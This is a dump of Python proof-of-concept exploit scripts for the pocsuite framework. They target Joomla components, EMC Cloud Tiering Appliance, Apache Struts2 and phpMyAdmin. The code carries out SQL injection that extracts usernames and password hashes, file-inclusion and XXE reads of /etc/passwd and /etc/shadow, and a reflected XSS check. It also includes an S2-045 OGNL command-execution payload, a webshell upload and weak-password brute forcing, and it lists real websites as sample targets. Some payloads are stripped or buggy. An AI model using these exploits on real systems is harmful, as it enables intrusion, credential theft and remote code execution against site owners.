    appName = 'EMC Cloud Tiering Appliance'
    appVersion = '10.0'
    vulType = 'XXE'
    desc = '''
EMC Cloud Tiering Appliance(CTA)是美国易安信(EMC)公司的一套基于策略的文件分层、
归档和迁移解决方案。该方案通过自动化文件分层、文件归档和文件迁移等功能优化网络存储(NAS)基础架构。
该架构的v10.0版本的/api/login处存在XXE漏洞,导致可以读取任意文件
'''
    samples = ['']

    def _attack(self):
        """Attack mode is not implemented: returns an empty (failed) result."""
        result = {}
        return self.parse_output(result)

    def _verify(self):
        """POST an XML login body with an external entity for *filename* and look for its contents in the reply."""
        result = {}
        # Attempt to read /etc/shadow as the test case
        filename='/etc/shadow'
        # Adjacent string literals joined with backslash-newline; .format() applies to the whole thing.
        # NOTE(review): the XML markup of this body was stripped during extraction (only quotes, "]>" and
        # "root" remain) and the gutter numbering skips a line (38 -> 40), so one literal is missing — confirm against the original.
        payload=r''\
''\
''\
']>' \
''\
'root'\
'root'\
''.format(file=filename)

        expurl='{url}/api/login'.format(url=self.url)
        try:
            # NOTE(review): self.headers is not defined in this file; presumably provided by POCBase — confirm.
            response=req.post(expurl,data=payload,headers=self.headers, timeout=50)
            # re.match anchors at the start of the body. NOTE(review): the pattern looks like the
            # /etc/passwd line shape ("root:x:0:0:..."), not the /etc/shadow format requested above.
            if re.match('root:.+?:0:0:.+?:.+?:.+?', response.content) and response.status_code==200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = expurl
                # NOTE(review): result['Fileinfo'] is never created, so this raises KeyError, which the
                # bare except below turns into an empty result.
                result['Fileinfo']['Filename']=filename
                result['Fileinfo']['Content']=response.content
            else:
                result={}
        except:
            # Bare except: also swallows KeyboardInterrupt/SystemExit.
            result={}
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
68 |
69 |
70 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_carman Cross Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """pocsuite PoC for ssvid-18676: reflected XSS via the msg parameter of Joomla com_carman."""
    # PoC metadata read by the pocsuite framework.
    vulID = '18676'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-12-24'
    createDate = '2016-01-21'
    updateDate = '2016-01-21'
    references = ['http://www.sebug.net/vuldb/ssvid-18676']
    name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla!'
    appVersion = 'N/A'
    vulType = 'XSS'
    desc = '''
Joomla组件com_carman由于参数msg过滤不严格,导致出现反射性XSS漏洞。

该漏洞利用的POC格式如下:
http://XXX/index.php?option=com_carman&msg=">

该漏洞在Firefox浏览器下利用与验证的效果截图如下所示:
(1)http://pan.baidu.com/s/1c0OnfWk
(2)http://pan.baidu.com/s/1skl3ifb
'''
    samples = ['http://carrentalsltd.com']

    def _attack(self):
        """Attack mode re-uses the verification routine."""
        return self._verify()

    def _verify(self):
        """Send the payload through the msg parameter and evaluate the response."""
        # Verify the flaw
        result = {}
        # Marker string (defined but not referenced by the check below as shown)
        strxss="<0x!Q_az*^~>"
        # Build the XSS verification payload
        # NOTE(review): only the quote-close remains; the markup part of this literal was presumably
        # stripped during extraction — confirm against the original.
        payload='">'
        # Vulnerable path
        exploit='/index.php?option=com_carman&msg='
        # Custom HTTP headers (a Content-Type is set although the request below is a GET)
        httphead = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive',
            "Content-Type": "application/x-www-form-urlencoded"
        }
        # Build the request URL
        vulurl=self.url+exploit+payload
        # Request
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        # Evaluate the response
        # NOTE(review): `'' in resp.content` is always True, so any HTTP 200 is reported as vulnerable
        # as written; the marker expected here was presumably lost with the payload markup.
        if resp.status_code==200 and '' in resp.content:
            # Verified
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] =self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite Output: success when non-empty, failure otherwise."""
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
72 |
73 |
74 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component com_job (showMoreUse) SQL injection vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | import re
8 |
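class TestPOC(POCBase):
    """UNION-based SQL injection in the Joomla! ``com_job`` component.

    The ``id`` parameter of ``task=showMoreUser`` is injected with a 25-column
    UNION whose 16th column is rendered in the page.  ``_verify`` places
    ``md5(1)`` there and looks for its digest; ``_attack`` places a
    ``concat()`` of ``username``/``password`` from the users table and parses
    the ``user=...:password=...:`` text back out of the response.
    """
    vulID = '67141'  # ssvid
    version = '1.0'
    author = ['hhxx']
    vulDate = '2009-12-08'
    createDate = '2016-01-14'
    updateDate = '2016-01-14'
    references = ['http://www.sebug.net/vuldb/ssvid-67141']
    name = 'Joomla Component com_job (showMoreUse) SQL injection vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component com_job'
    appVersion = 'N/A'
    vulType = 'SQL injection'
    desc = u'''
    Joomla! Component com_job 组件'index.php' SQL注入漏洞
    Joomla! Component com_job 组件的index.php中存在SQL注入漏洞。
    远程攻击者可以借助一个option操作中的id参数,执行任意SQL指令。
    '''
    samples = ['']

    # UNION payload template; ``%s`` is the expression placed in the echoed
    # column (16 of 25).  NOTE: the table prefix ``kew_`` is hard-coded, so a
    # site using another Joomla table prefix needs it changed here.
    PAYLOAD_TMPL = ('/index.php?option=com_job&task=showMoreUser&id=-1+union+select+'
                    '1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,%s,17,18,19,20,21,22,23,24,25'
                    '+from+kew_users--')
    # The hex literals decode to 'user=', ':', 'password=', ':' so the echoed
    # value reads ``user=<name>:password=<hash>:``.
    CRED_EXPR = 'concat(0x757365723d,username,0x3a,0x70617373776f72643d,password,0x3a)'
    # md5(1) as rendered by MySQL; its presence proves the UNION executed.
    MD5_1 = 'c4ca4238a0b923820dcc509a6f75849b'
    # Extractors for the two fields.  The original file had lost the group
    # names ('(?P.*?)' is invalid syntax and makes re.search raise re.error),
    # so the credential lookup below could never succeed.
    USER_RE = re.compile(r'user=(?P<username>.*?):')
    PASS_RE = re.compile(r'password=(?P<password>.*?):')
    TIMEOUT = 10

    def _request(self, expression):
        """GET the injection URL with ``expression`` in the echoed column.

        Returns ``(payload_path, response)``.
        """
        payload = self.PAYLOAD_TMPL % expression
        return payload, req.get('%s%s' % (self.url, payload), timeout=self.TIMEOUT)

    def _attack(self):
        """Dump one username/password pair from the users table."""
        result = {}
        _, res = self._request(self.CRED_EXPR)
        user = self.USER_RE.search(res.content)
        pwd = self.PASS_RE.search(res.content)
        if user and pwd:
            result['Database'] = {}
            result['Database']['Username'] = user.group('username')
            result['Database']['Password'] = pwd.group('password')
        return self.parse_output(result)

    def _verify(self):
        """Confirm the injection by looking for md5(1) in the response."""
        result = {}
        payload, res = self._request('md5(1)')
        if self.MD5_1 in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + payload
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output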
62 |
63 | register(TestPOC)
--------------------------------------------------------------------------------
/joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """Error-based SQL injection in the Joomla! "The Estate Agent" component.

    The ``id`` parameter of ``act=cat&task=showCE`` is injected with the
    ``FLOOR(RAND(0)*2)`` duplicate-key trick; the resulting MySQL error
    message echoes ``$~~~$<user>***<version>$~~~$`` which is parsed back out.
    Verification and attack are the same request.
    """
    vulID = '72776'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-11-29'
    createDate = '2016-01-24'
    updateDate = '2016-01-24'
    references = ['http://www.seebug.org/vuldb/ssvid-72776']
    name = 'joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'joomla component The Estate Agent '
    appVersion = 'N/A'
    vulType = 'SQL injection'
    desc = '''
    joomla component The Estate Agent对参数id过滤不严,导致出现SQL注入漏洞。
    远程攻击者可以利用回显报错等方式,执行SQL指令,获取敏感信息。
    '''
    samples = ['http://www.loyolapropiedades.com.ar']

    # Vulnerable entry point; the SQL below is appended to ``id``.
    EXPLOIT_PATH = '/index.php?option=com_estateagent&act=cat&task=showCE&id='
    # 0x247e7e7e24 = '$~~~$' and 0x2a2a2a = '***': delimiters around the
    # user() / version() values inside the duplicate-entry error text.
    PAYLOAD = ("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"
               "user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "
               "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -")
    MARKER = '$~~~$'
    # Captures <user> (group 1) and <version> (group 2) between the delimiters.
    INFO_RE = re.compile(r'\$~~~\$(.*)\*\*\*(.*)\$~~~\$', re.M | re.I)
    HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Connection': 'keep-alive'
    }
    TIMEOUT = 80

    def _attack(self):
        """Send the error-based payload and extract DB user and version."""
        result = {}
        resp = req.get(url=self.url + self.EXPLOIT_PATH + self.PAYLOAD,
                       headers=self.HEADERS, timeout=self.TIMEOUT)
        # Cheap pre-check before running the regex over the whole body.
        if self.MARKER not in resp.content:
            return self.parse_output(result)
        match = self.INFO_RE.search(resp.content)
        if match:
            result['DbInfo'] = {
                'Username': match.group(1),
                'Version': match.group(2),
            }
        return self.parse_output(result)

    def _verify(self):
        """Verification is the same request as the attack."""
        return self._attack()

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
72 |
73 |
74 | register(TestPOC)
--------------------------------------------------------------------------------
/_180323_170928_Struts2_045_rce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.api.request import req
4 | from pocsuite.api.poc import register
5 | from pocsuite.api.poc import Output, POCBase
6 | from pocsuite.api.utils import getWeakPassword
7 |
8 |
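class TestPOC(POCBase):
    """Apache Struts S2-045: OGNL injection through the Content-Type header.

    A crafted ``Content-Type`` value is evaluated as OGNL on the server.
    ``_verify`` runs ``echo <marker>`` through that expression and looks for
    the marker in the response body; nothing else is executed on the target.
    """
    vulID = '00004'
    version = '1.0'
    author = ['jeffzhang']
    vulDate = '2017-09-28'
    createDate = '2017-09-28'
    updateDate = '2017-09-28'
    references = ['']
    name = 'Struts2-045 命令执行漏洞'
    # The original pointed at phpMyAdmin, copied from a sibling POC.
    appPowerLink = 'https://struts.apache.org/'
    appName = 'Apache Struts'
    appVersion = '<=2.3.32'
    vulType = 'RCE'
    desc = '''
    程攻击者可通过发送恶意的数据包在受影响服务器上执行任意命令
    '''
    samples = ['']

    # Token echoed by the command; its presence in the body is the only
    # success signal.
    MARKER = '89aifh76ftq4fu38yfq498yf'
    # The original request had no timeout and could hang the scan.
    TIMEOUT = 20

    @staticmethod
    def _ognl_payload(command):
        """Return the S2-045 Content-Type value that executes ``command``.

        The expression clears the OGNL member-access restrictions, picks
        ``cmd.exe /c`` or ``/bin/bash -c`` by ``os.name`` and copies the
        process output into the HTTP response.  Only the ``#cmd`` fragment is
        %-formatted; the other fragments contain literal ``%{``.
        """
        parts = [
            "Content-Type:%{(#_='multipart/form-data').",
            "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).",
            "(#_memberAccess?",
            "(#_memberAccess=#dm):",
            "((#container=#context['com.opensymphony.xwork2.ActionContext.container']).",
            "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).",
            "(#ognlUtil.getExcludedPackageNames().clear()).",
            "(#ognlUtil.getExcludedClasses().clear()).",
            "(#context.setMemberAccess(#dm)))).",
            "(#cmd='%s')." % command,
            "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).",
            "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).",
            "(#p=new java.lang.ProcessBuilder(#cmds)).",
            "(#p.redirectErrorStream(true)).(#process=#p.start()).",
            "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).",
            "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).",
            "(#ros.flush())}",
        ]
        return ''.join(parts)

    def _attack(self):
        """No separate exploitation step; the verification already runs a command."""
        return self._verify()

    def _verify(self):
        """POST with the OGNL Content-Type and look for the echoed marker."""
        result = {}
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Content-Type': self._ognl_payload('echo %s' % self.MARKER),
        }
        response = req.post(self.url, headers=headers, timeout=self.TIMEOUT)
        if self.MARKER in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output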
66 |
67 |
68 | register(TestPOC)
69 |
--------------------------------------------------------------------------------
/EZ-Oscommerce 3.1 - Remote File Upload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import string
4 | import random
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 | from pocsuite.lib.utils.webshell import PhpVerify, PhpShell
9 | from pocsuite.lib.utils.password import genPassword
10 |
11 |
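class TestPOC(POCBase):
    """Unauthenticated file upload via EZ-Oscommerce ``admin/file_manager.php``.

    Both modes POST a file to ``file_manager.php?action=save`` and then fetch
    it back from the site root.  ``_verify`` uploads the framework's harmless
    probe (``PhpVerify``); ``_attack`` uploads a password-protected
    ``PhpShell`` and reports its URL and source.  The uploaded file is not
    removed afterwards.
    """
    vulID = '69439'  # ssvid
    version = '1.0'
    author = ['0xFATeam']
    vulDate = ''
    createDate = '2016-01-16'
    updateDate = '2016-01-16'
    references = ['http://www.sebug.net/vuldb/ssvid-69439']
    name = 'EZ-Oscommerce 3.1 - Remote File Upload'
    appPowerLink = 'http://www.ezosc.com'
    appName = 'Oscommerce'
    appVersion = '3.1'
    vulType = 'File Upload'
    desc = '''
    '''
    samples = ['']

    VUL_PATH = '/admin/file_manager.php'
    PARAMS = {'action': 'save'}
    # The original POSTs had no timeout and could hang the scan.
    TIMEOUT = 30

    @staticmethod
    def _random_php_name():
        """Six lowercase letters plus '.php'; random only to avoid collisions."""
        return ''.join(random.choice(string.ascii_lowercase) for _ in range(6)) + '.php'

    def _upload(self, webshell):
        """Upload ``webshell``'s content under a random file name.

        Returns ``(response, file_url, content)``.  ``file_url`` is the site
        root location the original POC checks; if the file manager saves
        elsewhere the check misses (TODO confirm against a target).
        """
        filename = self._random_php_name()
        content = webshell.get_content()
        data = {
            'filename': filename,
            'file_contents': content,
            'submit': ''
        }
        response = req.post(self.url + self.VUL_PATH, params=self.PARAMS, data=data,
                            timeout=self.TIMEOUT)
        return response, self.url + ('/%s' % filename), content

    def _attack(self):
        """Upload a password-protected shell and report where it landed."""
        result = {}
        webshell = PhpShell()
        webshell.set_pwd(genPassword(6))
        _, shell_url, content = self._upload(webshell)
        if webshell.check(shell_url):
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = shell_url
            result['ShellInfo']['Content'] = content
        return self.parse_output(result)

    def _verify(self):
        """Upload the harmless probe file and confirm it is served back."""
        result = {}
        webshell = PhpVerify()
        response, probe_url, _ = self._upload(webshell)
        if webshell.check(probe_url):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output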
82 |
83 |
84 | register(TestPOC)
--------------------------------------------------------------------------------
/_141017_phpMyAdmin_all_weak_password.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.api.request import req
4 | from pocsuite.api.poc import register
5 | from pocsuite.api.poc import Output, POCBase
6 | from pocsuite.api.utils import getWeakPassword
7 |
8 |
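class TestPOC(POCBase):
    """phpMyAdmin weak-password check.

    Locates the login form (site root, else ``/phpmyadmin/index.php``) and
    tries a short list of common passwords for ``root``/``admin`` against it.
    A guess counts as a login when the response contains one of the fragments
    the original POC uses as "logged in" markers.  The recorded ``Payload``
    contains the working credential pair in clear text.
    """
    vulID = '00003'
    version = '1.0'
    author = ''
    vulDate = '2013-04-23'
    createDate = '2016-03-07'
    updateDate = '2016-03-07'
    references = ''
    name = 'phpMyAdmin 弱密码漏洞'
    appPowerLink = 'http://www.phpMyAdmin.com/'
    appName = 'phpMyAdmin'
    appVersion = 'ALL'
    vulType = 'Weak Password'
    desc = '''
    phpMyAdmin弱口令登录,从而导致攻击者可据此信息进行后续攻击。
    '''
    samples = ['']

    # Fragments the original POC treats as evidence of a logged-in page.
    FLAG_LIST = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
                 'class="disableAjax" title=']
    USER_LIST = ['root', 'admin']
    PASSWORD_LIST = ['root', '123456', '12345678', 'password', 'passwd', '123']
    # The original requests had no timeout and could hang the scan.
    TIMEOUT = 10

    def _find_login_url(self):
        """Return the index.php URL serving the phpMyAdmin login form, or None."""
        try:
            response = req.get(self.url, timeout=self.TIMEOUT)
            if 'name=\"phpMyAdmin\"' in response.content:
                return str(self.url) + "/index.php"
            response = req.get(self.url + '/phpmyadmin/index.php', timeout=self.TIMEOUT)
            if 'input_password' in response.content and 'name="token"' in response.content:
                return self.url + "/phpmyadmin/index.php"
        except Exception:
            # Unreachable host or malformed reply: treat as "no login form".
            pass
        return None

    def _attack(self):
        """No separate exploitation step; reuse the password check."""
        return self._verify()

    def _verify(self):
        """Try each user/password pair; stop at the first successful login."""
        result = {}
        target_url = self._find_login_url()
        if target_url is None:
            # The original left target_url unbound here; every POST then
            # raised inside its except and was silently reported as a miss.
            return self.parse_output(result)
        for user in self.USER_LIST:
            for password in self.PASSWORD_LIST:
                payload_data = ("pma_username=" + str(user.strip()) + "&pma_password=" + str(password.strip())
                                + "&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci")
                try:
                    respond = req.post(target_url, data=payload_data, timeout=self.TIMEOUT)
                except Exception:
                    # A failed request for one guess should not abort the rest.
                    continue
                if any(flag in respond.content for flag in self.FLAG_LIST):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    result['VerifyInfo']['Payload'] = payload_data
                    # First hit wins: the original kept guessing after a
                    # success, which only adds login noise and can overwrite
                    # the recorded credentials with a later hit.
                    return self.parse_output(result)
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output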
71 |
72 |
73 | register(TestPOC)
74 |
--------------------------------------------------------------------------------
/Joomla Component simpledownload 0.9.5 - LFI Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
class TestPOC(POCBase):
    """Local file inclusion in Joomla! component simpledownload 0.9.5.

    The ``controller`` parameter is used in an include without stripping
    ``../``; per the description this needs magic_quotes_gpc off and
    PHP < 5.3.4 so that a trailing ``%00`` truncates the path.  ``_verify``
    pulls in ``/etc/passwd`` and looks for the ``nobody`` account line;
    ``_attack`` reuses it.
    """
    vulID = '68620'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-06-01'
    createDate = '2016-01-23'
    updateDate = '2016-01-23'
    references = ['http://www.seebug.org/vuldb/ssvid-68620']
    name = 'Joomla Component simpledownload 0.9.5 - LFI Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component simpledownload'
    appVersion = '0.9.5'
    vulType = 'LFI'
    desc = '''
    Joomla 组件simpledownload 0.9.5版本由于对参数controller过滤不严格,导致存在本地文件包含漏洞,
    在满足以下两个条件的前提下,可以结合%00截断,实现该漏洞的利用。
    (1)magic_quotes_gpc=off
    (2)PHP版本小于5.3.4

    该处漏洞读取/etc/passwd文件内容的POC格式如下:
    http://XXX.com/index.php?option=com_simpledownload
    &controller=../../../../../../../../../../../../../../../etc/passwd%00
    '''
    samples = ['http://tdctema.org']

    TARGET_FILE = '/etc/passwd'
    EXPLOIT_PATH = '/index.php?option=com_simpledownload&controller='
    # Fifteen '..' components, as in the original POC.
    TRAVERSAL = '/'.join(['..'] * 15)
    NULL_BYTE = '%00'
    HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Connection': 'keep-alive'
    }
    TIMEOUT = 50
    # One passwd(5)-style line for the 'nobody' account.
    PASSWD_RE = re.compile(r'nobody:.+?:[0-9]+:[0-9]+:.*:.*:.*', re.S | re.M)

    def _attack(self):
        """Reading the file is the whole attack; reuse _verify."""
        return self._verify()

    def _verify(self):
        """Request /etc/passwd through the include and record a snippet of it."""
        result = {}
        vulurl = (self.url + self.EXPLOIT_PATH + self.TRAVERSAL
                  + self.TARGET_FILE + self.NULL_BYTE)
        resp = req.get(url=vulurl, headers=self.HEADERS, timeout=self.TIMEOUT)
        if resp.status_code != 200:
            return self.parse_output(result)
        match = self.PASSWD_RE.search(resp.content)
        if match:
            result['VerifyInfo'] = {'URL': vulurl}
            result['FileInfo'] = {
                'Filename': self.TARGET_FILE,
                # Only a short prefix is reported, not the whole file.
                'Content': match.group(0)[:48] + '...',
            }
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
80 |
81 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component (com_jimtawl) Local File Inclusion Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
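class TestPOC(POCBase):
    """Directory traversal / local file inclusion in Joomla! ``com_jimtawl``.

    The ``task`` parameter is used as a path; per the description the
    ``%00`` truncation needs magic_quotes_gpc off and PHP < 5.3.4.
    ``_verify`` pulls in ``/etc/passwd`` and looks for the ``root`` line
    anywhere in the response (the file is rendered inside the Joomla page,
    not at offset 0); ``_attack`` reuses it.
    """
    vulID = '70258'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-03-23'
    createDate = '2016-02-13'
    updateDate = '2016-02-13'
    references = ['http://www.seebug.org/vuldb/ssvid-70258']
    name = 'Joomla Component (com_jimtawl) Local File Inclusion Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component (com_jimtawl)'
    appVersion = '1.0.2'
    vulType = 'Local File Inclusion'
    desc = '''
    Joomla!的 Jimtawl(com_jimtawl)组件1.0.2版本中存在目录遍历漏洞。
    远程攻击者可以借助向index.php传递的task参数中的“..”操作符,
    读取任意文件或者可能引起其他未明影响。

    该漏洞利用成功需要具备两个条件:
    (1)magic_quotes_gpc=off
    (2)PHP小于5.3.4

    该漏洞读取/etc/passwd的POC如下:
    http://***/index.php?option=com_jimtawl&Itemid=12&task=
    ../../../../../../../../../../../../../../../etc/passwd%00

    验证效果图如下所示:
    http://pan.baidu.com/s/1jHhgSKm
    '''
    samples = ['http://www.atbc.net.au']

    TARGET_FILE = '/etc/passwd'
    EXPLOIT_PATH = '/index.php?option=com_jimtawl&Itemid=12&task='
    NULL_BYTE = '%00'
    # Fifteen '..' components, as in the original POC.
    TRAVERSAL = '../../../../../../../../../../../../../../..'
    HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Connection': 'keep-alive'
    }
    TIMEOUT = 50
    # The root account line of passwd(5).  Used with search(), not match():
    # the original used re.match, which anchors at the first byte of the
    # response and therefore never matched a passwd file embedded in HTML.
    PASSWD_RE = re.compile(r'root:.+?:0:0:.+?:.+?:.+?')

    def _attack(self):
        """Reading the file is the whole attack; reuse _verify."""
        return self._verify()

    def _verify(self):
        """Request /etc/passwd through the include and record a snippet of it."""
        result = {}
        vulurl = self.url + self.EXPLOIT_PATH + self.TRAVERSAL + self.TARGET_FILE + self.NULL_BYTE
        resp = req.get(vulurl, headers=self.HEADERS, timeout=self.TIMEOUT)
        if resp.status_code != 200:
            return self.parse_output(result)
        match = self.PASSWD_RE.search(resp.content)
        if match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['Fileinfo'] = {}
            result['Fileinfo']['Filename'] = self.TARGET_FILE
            # Report the matched passwd line rather than the first 32 bytes
            # of the page, which are HTML when the file is embedded.
            result['Fileinfo']['Content'] = match.group(0)[:32] + '...'
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output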
81 |
82 |
83 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component (com_ezautos) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
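class TestPOC(POCBase):
    """UNION-based SQL injection in the Joomla! ``com_ezautos`` component.

    The ``firstCode`` parameter of ``task=helpers`` is injected with a
    7-column UNION whose third column is echoed.  ``_verify`` places
    ``md5(1)`` there; ``_attack`` places ``concat(version(), user())`` wrapped
    in delimiters and parses the two values back out.
    """
    vulID = '69896'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-10-09'
    createDate = '2016-01-09'
    updateDate = '2016-01-09'
    references = ['http://www.sebug.net/vuldb/ssvid-69896']
    name = 'Joomla Component (com_ezautos) SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.com'
    appName = 'Joomla'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
    joomla组件com_ezautos存在SQL注入漏洞,
    远程攻击者可借助index.php中的helpers操作的firstCode参数执行任意SQL命令。
    '''
    samples = ['http://www.auto-tradelink.co.uk']

    EXPLOIT_PATH = '/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode='
    # Delimiters as MySQL hex literals: 0x247e7e7e24 = '$~~~$', 0x2a2a2a = '***'.
    # The original sent them as quoted strings ('$~~~$'); hex literals need no
    # quote characters (which magic_quotes_gpc would escape) and keep the
    # literal marker out of the request, so a page that merely reflects the
    # query string cannot satisfy the extractor below.
    ATTACK_PAYLOAD = ("1+and+0+union+select+1,2,concat(0x247e7e7e24,version(),"
                      "0x2a2a2a,user(),0x247e7e7e24),4,5,6,7--")
    VERIFY_PAYLOAD = '1+and+0+union+select+1,2,md5(1),4,5,6,7--'
    MARKER = '$~~~$'
    # md5(1) as rendered by MySQL.
    MD5_1 = 'c4ca4238a0b923820dcc509a6f75849b'
    # Group 1 = version(), group 2 = user(); both must start with a word char.
    INFO_RE = re.compile(r"\$~~~\$([0-9a-zA-Z_].*)\*\*\*([0-9a-zA-Z_].*)\$~~~\$", re.I | re.M)
    HEADERS = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Connection': 'keep-alive'
    }
    TIMEOUT = 50

    def _request(self, payload):
        """GET the injection URL with ``payload`` appended to firstCode."""
        return req.get(url=self.url + self.EXPLOIT_PATH + payload,
                       headers=self.HEADERS, timeout=self.TIMEOUT)

    def _attack(self):
        """Extract database version and user through the echoed column."""
        result = {}
        resp = self._request(self.ATTACK_PAYLOAD)
        if self.MARKER not in resp.content:
            return self.parse_output(result)
        match = self.INFO_RE.search(resp.content)
        if match:
            result['DatabaseInfo'] = {}
            result['DatabaseInfo']['Version'] = match.group(1)
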